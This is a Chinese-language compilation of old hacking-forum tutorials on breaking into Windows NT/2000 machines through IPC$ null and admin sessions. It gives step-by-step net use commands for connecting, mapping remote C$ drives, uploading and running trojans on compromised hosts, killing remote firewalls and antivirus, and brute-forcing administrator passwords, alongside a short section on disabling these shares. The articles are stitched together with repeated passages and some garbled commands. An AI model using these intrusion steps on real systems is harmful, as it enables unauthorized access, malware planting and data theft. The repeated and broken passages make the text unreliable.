1. ipc入侵方法
關於ipc$、空連接和默認共享
簡單說明:
首先需要指出的是空連接和ipc$是不同的概念。空連接是在沒有信任的情況下與伺服器建立的會話,換句話說,它是一個到伺服器的匿名訪問。ipc$是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權。有許多的工具必須用到ipc$。默認共享是為了方便遠程管理而開放的共享,包含了所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
相關帖子:
嘗試自己解決問題的學習思路 http://www.sandflee.net/txt/list.asp?id=100
IPC進攻方法 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=1&topic=2498&show=1034
常見問題和回答:
1,怎樣建立空連接,它有什麼用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以簡單地和目標建立一個空連接(需要目標開放ipc$)。
對於NT,在默認安全設置下,藉助空連接可以列舉目標用戶、共享,訪問everyone許可權的共享,訪問小部分注冊表等,沒有什麼利用價值。對2000作用就更小了。而且實現也不方便,需藉助工具。如果你不理解「沒用」的東西為什麼還會存在,就看看「專業」的解釋吧:
在NT/2000下的空連接 http://www.3389.net/bbs/dispbbs.asp?boardID=22&RootID=3424&ID=3424&page=1:
解剖WIN2K下的空會話 http://www.sandflee.net/txt/list.asp?id=117
2,為什麼我連不上IPC$?
答:1,只有nt/2000/xp及以上系統才可以建立ipc$。如果你用的是98/me是沒有該功能的。
2,確認你的命令沒有打錯。正確的命令是: net use \目標IPipc$ "密碼"/user:"用戶名"
注意別多了或少了空格。當用戶名和密碼中不包含空格時兩邊的雙引號可以省略。空密碼用""表示。
3,根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 :很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 :你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期: 目標有帳號策略,強制定期要求更改密碼。
4,關於ipc$連不上的問題比較復雜,本論壇沒有總結出一個統一的認識,我在肉雞上實驗有時會得出矛盾的結論,十分棘手。
而且知道了問題所在,如果沒有用其他辦法獲得shell,很多問題依然不能解決。問題過於細致後就不適合在本文章里探討了。
各位看著辦吧,呵呵。
3,怎樣打開目標的IPC$?
答:首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬。當然,這shell必須是admin許可權的。然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法)。還是不行的話(比如有防火牆,殺不了)建議放棄。
4,怎樣映射和訪問默認共享?
答:使用命令 net use z: \目標IPc$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤,其他盤類推。
如果已經和目標建立了ipc$,則可以直接用IP加盤符加$訪問。比如 muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用戶名和密碼了:netuse y: \IPd$ 。然後 muma.exe y:pathmuma.exe 。當路徑中包含空格時,須用""將路徑全引住。
5,如何刪除映射和ipc$連接?
答:用命令 net use \IPipc$ /del 刪除和一個目標的ipc$連接。
用命令 net use z: /del 刪除映射的z盤,其他盤類推。
用命令 net use * /del 刪除全部。會有提示要求按y確認。
6,連上ipc$然後我能做什麼?
答:能使用管理員許可權的帳號成功和目標連接ipc$,表示你可以和對方系統做深入「交流」了。你可以使用各種命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享(沒開你就幫他開),你就可以上傳木馬並運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(木馬)還具有直接控屏的功能。如果是2000server,還可以考慮開啟終端服務方便控制。這里提到的工具的使用,請看自帶的說明或相關教程。
7,怎樣防止別人用ips$和默認共享入侵我?
答:A、一種辦法是把ipc$和默認共享都刪除了。但重起後還會有。這就需要改注冊表。
1,先把已有的刪除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有幾個刪幾個)
2,禁止建立空連接
首先運行regedit,找到如下主鍵[HKEY_LOCAL_]把RestrictAnonymous(DWORD)的鍵值改為:00000001。
3,禁止自動打開默認共享
對於server版,找到如下主鍵[HKEY_LOCAL_]把AutoShareServer(DWORD)的鍵值改為:00000000。
對於pro版,則是[HKEY_LOCAL_]把AutoShareWks(DWORD)的鍵值改為:00000000。
B、另一種是關閉ipc$和默認共享依賴的服務(不推薦)
net stop lanmanserver
可能會有提示說,XXX服務也會關閉是否繼續。因為還有些次要的服務依賴於lanmanserver。一般情況按y繼續就可以了。
C、最簡單的辦法是設置復雜密碼,防止通過ipc$窮舉密碼。但如果你有其他漏洞,ipc$將為進一步入侵提供方便。
D、還有一個辦法就是裝防火牆,或者埠過濾。防火牆的方法就不說了
---------------------------ipc$漏洞
沖擊波利用ipc$,震盪波rpc$漏洞
139.135.445埠
------------------------------
部分城市的網路供應商(isp)屏蔽啦139.445.135埠。ipc$連接失敗的原因
ipc$ 連接失敗後經常看一些入侵相關文章的朋友不難發現,好像大部分的入侵都非要用到ipc$連接(事實上並不是這樣),而在許多安全雜志上一提到入侵,無論是在去取得administrator之前,還是在拿到了administrator之後上傳工具,都在頻繁的使用到了ipc$。這似乎是一個很大的缺口,看別人說的好像容易的就像用冰河一樣,但事實上,大部分管理員根本不會給你這種機會,讓你去用ipc$為所欲為,管理員會想盡一切辦法屏蔽掉這個眾人皆知的漏洞。傻子才會開著共享,等著你去黑呢~~所以也就出現了很多朋友抱怨ipc$連不上,或者什麼什麼號錯誤。從而大大打擊了我們學習黑客的熱情。我今天就想和大家一起來看一下ipc$失敗的原因和解決的方法。
什麼是ipc¥?
我們最好先來看一下什麼是ipc¥連接。ipc(internet process connection)是遠程網路連接。而ipc$,admin$,c$,d$,e$這些則是winnt和win2000的默認共享。ipc$就是一種管道通訊,它在兩個ip間建立一個連接。我們一般看到對方主機開了139,445,我們一般就說對方開了共享。就可以嘗試用ipc¥連接。net net use \\遠程的ip\ipc$"password" \user:"username"[如圖1]
說明:這種功能只在winnt和win2000種才有,windows98是沒有的。很多朋友對ipc¥連接的概念很混淆,我在這里羅嗦幾句,ipc¥連接分為ipc$空連接和帶有一定許可權ipc$連接,這兩者可是大大的不一樣,許多朋友在建立了空連接之後,就著急的想工具上去,這是肯定會報錯的[如圖2],其實這也是很多朋友經常碰到的問題。因為這是空連接,沒有任何的許可權(就好像匿名訪問一樣),除了可以得到遠程主機的netbios信息外,什麼命令都執行不了。
而可以復制文件是你獲得了一定的許可權後,比如說你得到一個管理員密碼是空口令,也就是帶有一定許可權的ipc$連接,空連接只是簡單的和遠程主機建立了一個通訊的管道。是不是什麼用都沒有呢?當然不是了,我們可以用暴力破解的方法來得到管理員的密碼,就是掛上字典不斷地進行對ipc$空連接的試探,從而達到取得管理員密碼的目的,最有名的工具就是小榕的smbcrack.因為不是這次我們說的重點,所以如果大家感興趣可以自己到我們的論壇www.itaq.org)看相關文章.
到這里我已經對ipc¥空連接和帶有一定許可權ipc$連接有了一個比較清楚的了解。好了,現在我們來自己分析一下ipc$常見的失敗原因,我們要用到的只是一台虛擬機,或者你有自己的肉雞,或者區域網。我在這里選擇虛擬機(原因很簡單:省錢~~~別打我)。
1、錯誤1326
我們用命令net use \\192.168.60.128\ipc$ "12345" /user:"admaninistrator"進行連接,[如圖3]報系統發生1326錯誤,登陸失敗:未知用戶名或密碼錯誤。這個錯誤很常見哦~~~,我們檢查一下我們的命令,發現原來是用戶名輸入錯誤。(也可能是你的密碼輸入錯誤)
3、錯誤53
再次輸入net use \\192.168.60.128\ipc$ "12345" /user:"admninistrator",報系統發生錯誤53錯誤[如圖4],找不到網路名。剛才試找不到路徑,現在是找不到網路名。我們在進肉雞看一下,查看一下系統進程,原來遠程主機(虛擬機)開了防火牆。我們殺掉這個進程。看一下,連接成功了!
2、錯誤67
這也是我們經常碰到的,讓我們許多剛上路的黑友郁悶不已,我們來試一下,輸入命令net use \\192.168.60.128\ipc$ "12345" /user:"admninistrator"報系統發生錯誤67錯誤[如圖5],找不到網路路徑。我們需要進入我們的虛擬機看一下,查看一下共享,原來是沒開共享,難怪找不到路徑。[如圖6] 我們可以用net share 打開共享。這樣就可以了,不會報錯了。
解決方法
我們現在已經了解了ipc$失敗的原因,我們知道稍微有一點安全意識的網路管理員都會關閉掉共享,不會給你機會用簡單的ipc$連接進入他的機子,而如果他屏蔽掉了ipc$共享並且開了很少的服務(或者根本禁止了許多可以利用的服務),就算你通過某種方法比如說溢出攻擊,得到了許可權,進入了系統,這時你添加一個賬號也沒什麼意義。想用ipc$連接上傳工具,卻發現連續的報錯,錯誤1326和錯誤67比較簡單,容易對付。如果碰到對方開了防火牆,也就是(錯誤67),遠程連接不上,我們怎麼辦呢?這里提供幾種辦法,
1、殺掉遠程主機中的防火牆,如果對方安裝了resouce kit 那麼我們就可以用tlist 和kill 兩個命令來找到並且殺掉防火牆的進程。
2、利用tftp。並不是說有的管理員都安裝了resouce kit,那我們怎麼辦呢?我們知道2000是自帶的tftp,我們可以用tftp來上傳工具,如tlist 、kill等等,然後關閉防火牆和殺毒軟體
3、利用自己的ftp。我們還可以自己駕一個ftp伺服器,然後用遠程的計算機反過來ftp我們自己的機子,達到上傳工具的目的。然後殺掉進程...(其實已經沒必要了)剩下的就隨你的便了。
其實這篇文章沒什麼技術性可言,只是針對網上朋友們經常提的一些問題作一個總結性的回答。希望能給初學者帶來一些方便,還有就是希望初學者能明白,許多事情最好自己試著去做一下,不要光是提問,因為在這個領域內沒有什麼人可以真正的幫助,只有你自己!!黑客是什麼??不管你問多少人,回答只有一個:黑客是一種精神,一種自我鑽研的
=========================C:\>net use \\192.168.0.8\ipc$ "sa" /user:administrator
命令成功完成。
C:\>net use W: \\192.168.0.8\c$ "sa" /user:administrator
命令成功完成。
C:\>dir w
驅動器 C 中的卷是 win003
卷的序列號是 3C7D-5090C:\ 的目錄找不到文件C:\>dir w:
驅動器 W 中的卷沒有標簽。
卷的序列號是 BC42-1D99W:\ 的目錄2006-12-12 18:12 <DIR> airs
2006-12-01 16:36 0 AUTOEXEC.BAT
2006-12-01 16:36 0 CONFIG.SYS
2006-12-01 17:04 <DIR> Documents and Settings
2006-12-26 14:36 <DIR> Program Files
2006-12-12 18:02 <DIR> TDdownload
2006-12-12 18:28 <DIR> tools_jc
2006-12-14 12:09 <DIR> WINDOWS
2006-12-01 16:40 <DIR> wmpub
2 個文件 0 位元組
7 個目錄 4,431,769,600 可用位元組------------------------原始文檔: http://www.xfocus.net/articles/200303/493.html
創建時間:2003-03-16
瀏覽次數:5600
原創:iqst (papabang_at_qingnews.com)
來源:菜菜鳥社區htt://pccbirds.yeah.net
一份詳盡的IPC$入侵資料-----------------------------經過整理手頭的資料而成,並非原創,不過帶著汗水,往轉貼時註明出處
2. 為什麼無法建立ipc連接
1 首先,我們先建立一個空連接(當然,這需要目標開放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四個空格,net與use中間有一個空格,use後面一個,密碼左右各一個空格。
2 查看遠程主機的共享資源
命令:net view \\ip
解釋:前提是建立了空連接後,用此命令可以查看遠程主機的共享資源,如果它開了共享,可以得到如下面的結果,但此命令不能顯示默認共享。
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當前時間
命令: net time \\ip
解釋:用此命令可以得到一個遠程主機的當前時間。
4 得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一個遠程主機的NetBIOS用戶名列表,返回如下結果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我們經常使用空會話做的事情,好像也能獲得不少東西喲,不過要注意一點:建立IPC$連接的操作會在Event Log中留下記錄,不管你是否登錄成功。 好了,那麼下面我們就來看看ipc$所使用的埠是什麼?
五 ipc$所使用的埠
首先我們來了解一些基礎知識:
1 SMB:(Server Message Block) Windows協議族,用於文件列印共享的服務;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)埠實現基於TCP/IP協議的NETBIOS網路互聯。
3 在WindowsNT中SMB基於NBT實現,即使用139(TCP)埠;而在Windows2000中,SMB除了基於NBT實現,還可以直接通過445埠實現。
有了這些基礎知識,我們就可以進一步來討論訪問網路共享對埠的選擇了:
對於win2000客戶端(發起端)來說:
1 如果在允許NBT的情況下連接伺服器時,客戶端會同時嘗試訪問139和445埠,如果445埠有響應,那麼就發送RST包給139埠斷開連接,用455埠進行會話,當445埠無響應時,才使用139埠,如果兩個埠都沒有響應,則會話失敗;
2 如果在禁止NBT的情況下連接伺服器時,那麼客戶端只會嘗試訪問445埠,如果445埠無響應,那麼會話失敗。
對於win2000伺服器端來說:
1 如果允許NBT, 那麼UDP埠137, 138, TCP 埠 139, 445將開放(LISTENING);
2 如果禁止NBT,那麼只有445埠開放。
我們建立的ipc$會話對埠的選擇同樣遵守以上原則。顯而易見,如果遠程伺服器沒有監聽139或445埠,ipc$會話是無法建立的。
六 ipc管道在hack攻擊中的意義
ipc管道本來是微軟為了方便管理員進行遠程管理而設計的,但在入侵者看來,開放ipc管道的主機似乎更容易得手。通過ipc管道,我們可以遠程調用一些系統函數(大多通過工具實現,但需要相應的許可權),這往往是入侵成敗的關鍵。如果不考慮這些,僅從傳送文件這一方面,ipc管道已經給了入侵者莫大的支持,甚至已經成為了最重要的傳輸手段,因此你總能在各大論壇上看到一些朋友因為打不開目標機器的ipc管道而一籌莫展大呼救命。當然,我們也不能忽視許可權在ipc管道中扮演的重要角色,想必你一定品嘗過空會話的尷尬,沒有許可權,開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的許可權,那麼ipc管道這把雙刃劍將顯示出它猙獰的一面。
七 ipc$連接失敗的常見原因
以下是一些常見的導致ipc$連接失敗的原因:
1 IPC連接是Windows NT及以上系統中特有的功能,由於其需要用到Windows NT中很多DLL函數,所以不能在Windows 9.x/Me系統中運行,也就是說只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立一個ipc$連接,就需要響應方開啟ipc$共享,即使是空連接也是這樣,如果響應方關閉了ipc$共享,將不能建立連接;
3 連接發起方未啟動Lanmanworkstation服務(顯示名為:Workstation):它提供網路鏈結和通訊,沒有它發起方無法發起連接請求;
4 響應方未啟動Lanmanserver服務(顯示名為:Server):它提供了 RPC 支持、文件、列印以及命名管道共享,ipc$依賴於此服務,沒有它主機將無法響應發起方的連接請求,不過沒有它仍可發起ipc$連接;
5 響應方未啟動NetLogon,它支持網路上計算機 pass-through 帳戶登錄身份(不過這種情況好像不多);
6 響應方的139,445埠未處於監聽狀態或被防火牆屏蔽;
7 連接發起方未打開139,445埠;
8 用戶名或者密碼錯誤:如果發生這樣的錯誤,系統將給你類似於'無法更新密碼'這樣的錯誤提示(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號""即可;
10 如果在已經建立好連接的情況下對方重啟計算機,那麼ipc$連接將會自動斷開,需要重新建立連接。
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員許可權的;
錯誤號51,Windows無法找到網路路徑:網路有問題;
錯誤號53,找不到網路路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。
...............哈哈,你先刪除原來的鏈接, net use \\ip\ipc$ /del 刪除IPC鏈接 ,然後在鏈接就好了!~
3. ipc$什麼意思
ipc$詳細解釋大全
一 前言
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄。
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的種種迷惑(你隨便找一個hack論壇搜一下ipc$,看看存在的疑惑有多少)。因此我參考了網上的一些資料,教程以及論壇帖子,寫了這篇總結性質的文章,想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!
注意:本文所討論的各種情況均默認發生在win NT/2000環境下,win98將不在此次討論之列,而鑒於win Xp在安全設置上有所提高,個別操作並不適用,有機會將單獨討論。
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時,在初次安裝系統時還打開了默認共享,即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。
平時我們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實ipc$並不是一個真正意義上的漏洞,我想之所以有人這么說,一定是指微軟自己安置的那個『後門』:空會話(Null session)。那麼什麼是空會話呢?
三 什麼是空會話
在介紹空會話之前,我們有必要了解一下一個安全會話是如何建立的。
在Windows NT 4.0中是使用挑戰響應協議與遠程機器建立一個會話的,建立成功的會話將成為一個安全隧道,建立雙方通過它互通信息,這個過程的大致順序如下:
1)會話請求者(客戶)向會話接收者(伺服器)傳送一個數據包,請求安全隧道的建立;
2)伺服器產生一個隨機的64位數(實現挑戰)傳送回客戶;
3)客戶取得這個由伺服器產生的64位數,用試圖建立會話的帳號的口令打亂它,將結果返回到伺服器(實現響應);
4)伺服器接受響應後發送給本地安全驗證(LSA),LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是伺服器的本地帳號,核實本地發生;如果請求的帳號是一個域的帳號,響應傳送到域控制器去核實。當對挑戰的響應核實為正確後,一個訪問令牌產生,然後傳送給客戶。客戶使用這個訪問令牌連接到伺服器上的資源直到建議的會話被終止。
以上是一個安全會話建立的大致過程,那麼空會話又如何呢?
空會話是在沒有信任的情況下與伺服器建立的會話(即未提供用戶名與密碼),但根據WIN2000的訪問控制模型,空會話的建立同樣需要提供一個令牌,可是空會話在建立過程中並沒有經過用戶信息的認證,所以這個令牌中不包含用戶信息,因此,這個會話不能讓系統間發送加密信息,但這並不表示空會話的令牌中不包含安全標識符SID(它標識了用戶和所屬組),對於一個空會話,LSA提供的令牌的SID是S-1-5-7,這就是空會話的SID,用戶名是:ANONYMOUS LOGON(這個用戶名是可以在用戶列表中看到的,但是是不能在SAM資料庫中找到,屬於系統內置的帳號),這個訪問令牌包含下面偽裝的組:
Everyone
Network
在安全策略的限制下,這個空會話將被授權訪問到上面兩個組有權訪問到的一切信息。那麼建立空會話到底可以作什麼呢?
四 空會話可以做什麼
對於NT,在默認安全設置下,藉助空連接可以列舉目標主機上的用戶和共享,訪問everyone許可權的共享,訪問小部分注冊表等,並沒有什麼太大的利用價值;對2000作用更小,因為在Windows 2000 和以後版本中默認只有管理員和備份操作員有權從網路訪問到注冊表,而且實現起來也不方便,需藉助工具。從這些我們可以看到,這種非信任會話並沒有多大的用處,但從一次完整的ipc$入侵來看,空會話是一個不可缺少的跳板,因為我們從它那裡可以得到戶列表,這對於一個老練的黑客已經足夠了。以下是空會話中能夠使用的具體命令:
1 首先,我們先建立一個空會話(需要目標開放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四個空格,net與use中間有一個空格,use後面一個,密碼左右各一個空格。
2 查看遠程主機的共享資源
命令:net view \\IP
解釋:建立了空連接後,用此命令可以查看遠程主機的共享資源,如果它開了共享,可以得到如下類似類似結果:
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當前時間
命令:net time \\IP
解釋:用此命令可以得到一個遠程主機的當前時間。
4 得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
nbtstat -A IP
用此命令可以得到一個遠程主機的NetBIOS用戶名列表(需要你的netbios支持),返回如下結果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我們經常使用空會話做的事情,好像也能獲得不少東西喲,不過要注意一點:建立IPC$連接的操作會在EventLog中留下記錄,不管你是否登錄成功。 好了,那麼下面我們就來看看ipc$所使用的埠是什麼?
五 ipc$所使用的埠
首先我們來了解一些基礎知識:
1 SMBServer Message Block) Windows協議族,用於文件列印共享的服務;
2 NBTNETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)埠實現基於TCP/IP協議的NETBIOS網路互聯。
3 在WindowsNT中SMB基於NBT實現,而在Windows2000中,SMB除了基於NBT實現,還可以直接通過445埠實現。
有了這些基礎知識,我們就可以進一步來討論訪問網路共享對埠的選擇了:
對於win2000客戶端來說:
1 如果在允許NBT的情況下連接伺服器時,客戶端會同時嘗試訪問139和445埠,如果445埠有響應,那麼就發送RST包給139埠斷開連接,用455埠進行會話,當445埠無響應時,才使用139埠,如果兩個埠都沒有響應,則會話失敗;
2 如果在禁止NBT的情況下連接伺服器時,那麼客戶端只會嘗試訪問445埠,如果445埠無響應,那麼會話失敗。由此可見,禁止了NBT後的win 2000對win NT的共享訪問將會失敗。
對於win2000伺服器端來說:
1 如果允許NBT, 那麼UDP埠137, 138, TCP 埠 139, 445將開放;
2 如果禁止NBT,那麼只有445埠開放。
我們建立的ipc$會話對埠的選擇同樣遵守以上原則。顯而易見,如果遠程伺服器沒有監聽139或445埠,ipc$會話是無法建立的。
六 ipc$連接在hack攻擊中的意義
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),如果你能夠以某一個具有一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,那你可就了不得了,基本上可以為所欲為了。不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些粗心的管理員存在弱口令,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼將會越來越難的,因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,甚至在主機不開啟ipc$共享時,你根本就無法連接,你會慢慢的發現ipc$連接並不是萬能的,所以不要奢望每次連接都能成功,那是不現實的。
是不是有些灰心?倒也不用,關鍵是我們要擺正心態,不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它只是很多入侵方法中的一種,你有可能利用它一擊必殺,也有可能一無所獲,這些都是正常的,在黑客的世界裡,不是每條大路都能通往羅馬,但總有一條路會通往羅馬,耐心的尋找吧!
七 ipc$連接失敗的常見原因
以下是一些常見的導致ipc$連接失敗的原因:
1 IPC連接是Windows NT及以上系統中特有的功能,由於其需要用到Windows NT中很多DLL函數,所以不能在Windows 9.x/Me系統中運行,也就是說只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立一個ipc$連接,就需要對方開啟ipc$共享,即使是空連接也是這樣,如果對方關閉了ipc$共享,你將會建立失敗;
3 你未啟動Lanmanworkstation服務,它提供網路鏈結和通訊,沒有它你無法發起連接請求(顯示名為:Workstation);
4 對方未啟動Lanmanserver服務,它提供了 RPC 支持、文件、列印以及命名管道共享,ipc$依賴於此服務,沒有它遠程主機將無法響應你的連接請求(顯示名為:Server);
5 對方未啟動NetLogon,它支持網路上計算機 pass-through 帳戶登錄身份;
6 對方禁止了NBT(即未打開139埠);
7 對方防火牆屏蔽了139和445埠;
8 你的用戶名或者密碼錯誤(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號""即可;
10 如果在已經建立好連接的情況下對方重啟計算機,那麼ipc$連接將會自動斷開,需要重新建立連接。
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows無法找到網路路徑:網路有問題;
錯誤號53,找不到網路路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。
八 復制文件失敗的原因
有些朋友雖然成功的建立了ipc$連接,但在時卻遇到了這樣那樣的麻煩,無法復製成功,那麼導致復制失敗的常見原因又有哪些呢?
1 盲目復制
這類錯誤出現的最多,佔到50%以上。許多朋友甚至都不知道對方是否有共享文件夾,就進行盲目復制,結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用net view \\IP這個命令看一下對方的共享情況,不要認為ipc$連接建立成功了就一定有共享文件夾。
2 默認共享判斷錯誤
這類錯誤也是大家經常犯的,主要有兩個小方面:
1)錯誤的認為能建立ipc$連接的主機就一定開啟了默認共享,因而在建立完連接之後馬上向admin$之類的默認共享復制文件,導致復制失敗。ipc$連接成功只能說明對方打開了ipc$共享,ipc$共享與默認共享是兩碼事,ipc$共享是一個命名管道,並不是哪個實際的文件夾,而默認共享並不是ipc$共享的必要條件;
2)由於net view \\IP 無法顯示默認共享(因為默認共享帶$),因此通過這個命令,我們並不能判斷對方是否開啟了默認共享,因此如果對方未開啟默認共享,那麼所有向默認共享進行的操作都不能成功;(不過大部分掃描軟體在掃弱口令的同時,都能掃到默認共享目錄,可以避免此類錯誤的發生)
3用戶許可權不夠,包括四種情形:
1)空連接向所有共享(默認共享和普通共享)復制時,大多情況下許可權是不夠的;
2)向默認共享復制時,要具有管理員許可權;
3)向普通共享復制時,要具有相應許可權(即對方事先設定的訪問許可權);
4)對方可以通過防火牆或安全軟體的設置,禁止外部訪問共享;
還需要說明一點:不要認為administrator就一定是管理員,管理員名稱是可以改的。
4被防火牆殺死或在區域網
也許你的復制操作已經成功,但當遠程運行時,被防火牆殺掉了,導致找不到文件;還有可能你把木馬復制到了區域網內的主機,導致連接失敗。因此建議你復制時要小心,否則就前功盡棄了。
呵呵,大家也知道,ipc$連接在實際操作過程中會出現千奇百怪的問題,上面我所總結的只是一些常見錯誤,沒說到的,只能讓大家自己去體會了。
九 如何打開目標的IPC$共享以及其他共享
目標的ipc$不是輕易就能打開的,否則就要天下打亂了。你需要一個admin許可權的shell,比如telnet,木馬等,然後在shell下執行net share ipc$來開放目標的ipc$,用net share ipc$ /del來關閉共享。如果你要給它開共享文件夾,你可以用net share baby=c:\,這樣就把它的c盤開為共享名為baby共享了。
十 一些需要shell才能完成的命令
看到很多教程這方面寫的十分不準確,一些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了,起了誤導作用。那麼下面我總結一下需要在shell才能完成的命令:
1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在shell下完成;
2 打開遠程主機的ipc$共享,默認共享,普通共享的操作需要在shell下完成;
3 運行/關閉遠程主機的服務,需要在shell下完成;
4 啟動/殺掉遠程主機的進程,也需要在shell下完成。
十一 入侵中可能會用到的相關命令
請注意命令適用於本地還是遠程,如果適用於本地,你只能在獲得遠程主機的shell後,才能向遠程主機執行。
1 建立空連接:
net use \\IP\ipc$ "" /user:""
2 建立非空連接:
net use \\IP\ipc$ "psw" /user:"account"
3 查看遠程主機的共享資源(但看不到默認共享)
net view \\IP
4 查看本地主機的共享資源(可以看到本地的默認共享)
net share
